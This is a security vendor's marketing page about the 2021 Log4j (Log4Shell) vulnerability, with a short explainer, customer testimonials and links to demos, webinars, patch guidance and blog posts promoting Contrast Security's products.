0-day

LOG4J

WHAT IS LOG4J

Log4j is a programming library (ie. pre-written code) that appears in millions of computer applications globally. It is free, open-source, and has been widely-used since 2001. 

Applications use Log4j to write short amounts of information into files/databases for “logging” purposes.

What happened? 

On Dec 9th, 2021, users discovered that by exploiting the Log4j library, they could access unauthorized information or control a computer remotely. 

Hackers then began using Log4j to hack into large enterprise (Apple, Amazon, Twitter, Baidu, etc.) and government systems. The extent of the impact globally is still unfolding.

Why does it matter to me? 

Any exposed system can be easily exploited by a remote attacker. The exploit is easy to do, and ~3 billion systems globally are exposed. A patch has been released, but most organizations can’t find all instances of Log4j in their code. Completing the patch across all systems is labor intensive and will take a long time. This incident is worse than the 2017 Equifax hack, which cost that company $425M+ in fines. 

“Before Contrast, we were using different static application security testing (SAST), software composition analysis (SCA), and WAF solutions. We found ourselves overwhelmed with tool soup. Contrast consolidated everything into a single platform with accurate and fast results that we were not aware of before. The ability to offer interactive application security testing (IAST) and runtime application self-protection (RASP) in a single agent was a major selling point for us. The platform features were more mature than their competition and made it easier to manage, integrate and consume results. We were also impressed with the seamless onboarding process. As an example, Contrast is protecting us against the recently disclosed Log4j vulnerability without having to patch or update our servers.”

Brian Vlootman, CISO
BACKBASE

 

 

Just received the official notification that Contrast is protecting against this. GREAT WORK! This highlights a really big win and has direct resource impacts for folks internally using it. They actually get to have the weekend off vs. other teams scrambling to fix.

Distinguished Advisor
Medical Device Manufacturer

 

 

We were able to analyze whether our own built software would be vulnerable to the Log4j zero-day, using the Contrast Secure Code Platform, and got the answer within 30 seconds by just looking at the Libraries menu! How fast is that!

Sandor Incze, CISO
CM.com

 

 

Contrast provided useful reporting on log4j CVE for apps onboarded to Contrast. We also used information from your blog. After this week I can categorically say there is a LOT more interest in Contrast

Paul Lewis, BISO
Elsevier
CONTRAST VS THE LOG4J2 CVE - A DEMONSTRATION

Contrast Security co-founder, Jeff Willams demos the Contrast Secure Code Platform and finds the vulnerability that caused CVE-2021-44228 and stops attacks against it, without updating versions or using a WAF.

WATCH NOW

DEMO
Contrast Security experts weigh in on the recent LOG4J2 exploit.

Hear from Contrast Security’s Director of Developer Relations, Erik Costlow on what can be done to mitigate the 0-day now, recommended best approaches, and how you can prevent exploitation right now. 

LEARN MORE

JAVA LOG4J2
The Contrast Secure Code Platform

is explicitly engineered for security events like the current ongoing Log4j remote code execution vulnerability.

cs-platform
Contrast Protect

can stop the Log4j vulnerability today, in your production systems, without requiring software upgrades.

cs-protect
Contrast Assess and Contrast SCA

enable development teams to find the vulnerability in applications before they’re released to production.

cs-assess-sca

Additional Resources

Preparing for the Next Zero-Day Vulnerability

Live Webinar - January 26th at 9am PST

Join Larry Maccherone, DevSecOps Transformation lead at Contrast Security, and Farshad Abasi, Chief Security Officer at Forward Security for an interactive discussion about how to future-proof against emerging threats on the horizon so your organization is prepared to respond instantly to zero-day vulnerabilities like Log4Shell.

REGISTER NOW
[UPGRADE TO 2.17] UPDATED GUIDANCE ON ADDRESSING LOG4J CVES

This morning, the Apache Software Foundation provided another update to log4j (version 2.17.0) to address a new CVE-2021-45105. Contrast recommends using this most secure version.

Learn More
EXPRESSION LANGUAGE AND DESERIALIZATION ATTACKS ON THE RISE IN LEAD-UP TO LOG4J VULNERABILITY

It’s been a couple of weeks since the first public disclosure of the Log4j vulnerability. A lot has happened - perhaps the understatement of the year. Several rounds of new patches have been issued from the Apache Software foundation and others as new information about this unprecedented security issue is discovered. We’re now learning about some of the more sinister aspects of this situation with nation state actors exploiting the vulnerability.

READ BLOG
THREE REASONS WHY CONTRAST SCA IS BEST SUITED FOR LOG4SHELL RAPID RESPONSE

Tools that present a deluge of irrelevant findings lead security teams to chase their developers to patch libraries that aren’t actually used by their application! In short, in the event of a zero-day incident response scenario, SCA tools need to enable teams to easily identify applications at risk, confirm which of them are actually vulnerable, and provide a quick means to institute some form of protection in place. Enter Contrast and its cross-platform approach to Software Composition Analysis.

 
READ BLOG
CONTRAST SECURITY PROTECTS SERVERLESS APPLICATIONS FROM LOG4J ATTACKS

As I write this blog, and this very moment you’re reading it, hackers are making tens of thousands of attempts to exploit this critical security vulnerability in Java logging library Apache Log4j. . If your organization uses Java, there is a good chance it’s exposed to this vulnerability. Don’t stay idle, waiting for something to go wrong, make sure your Serverless application is secure. 

 
READ BLOG
LOG4J ON-DEMAND WEBINAR

ON-DEMAND RECORDING AVAILABLE

The most serious of vulnerabilities was just found in the most used logging framework, but DevSecOps teams can quickly identify what’s impacted and where they focus their time.

WATCH NOW
LOG4SHELL BY THE NUMBERS

We monitor many thousands of applications with Contrast Assess (IAST), Contrast SCA, and Contrast Protect (RASP) so we have a unique data set compared to others and, so far, we have some really interesting takeaways. 

Learn More
UPDATED GUIDANCE ON ADDRESSING LOG4J CVES

The Apache Software Foundation provided updated guidance that the patch to fix Log4Shell (version 2.15.0 and below) was insufficient – a new update (version 2.16.0) fixes these issues. 

Learn More
INSTANTLY INOCULATE YOUR SERVERS AGAINST LOG4J WITH NEW OPEN SOURCE TOOL
Learn More
WAF, RASP AND LOG4SHELL

Log4Shell has done an excellent job of making the case for Runtime Application Self-Protection (RASP). Here’s the quick summary: our Contrast Protect customers have been secure against the remote code execution (RCE) in this vulnerability for..

Read More
THE LOG4J VULNERABILITY IS BAD. HERE’S THE GOOD NEWS

Contrast News By: VentureBeat  Dec 13, 2021 6:18:47 PM

A critical vulnerability discovered in Log4j, a widely deployed open source Apache logging library, is almost certain to be exploited by hackers — probably very soon. Security teams are working full-throttle to patch their systems, trying to prevent a calamity. (The massive 2017 privacy records breach of Equifax involved a similar vulnerability.) It’s a very bad day, and it could get much worse soon.

Learn More
Contrast Security Protects Global Enterprises and Fortune 500 Customers from Log4j Attacks

Press Release - Dec. 17 2021

The Contrast platform secures the world’s largest organizations against applications using Log4j without patching while protecting against future vulnerabilities.

 

 

Learn More

Leverage the Contrast Secure Code Platform and service offerings to stop attacks at runtime with Contrast Protect at no charge for a limited time.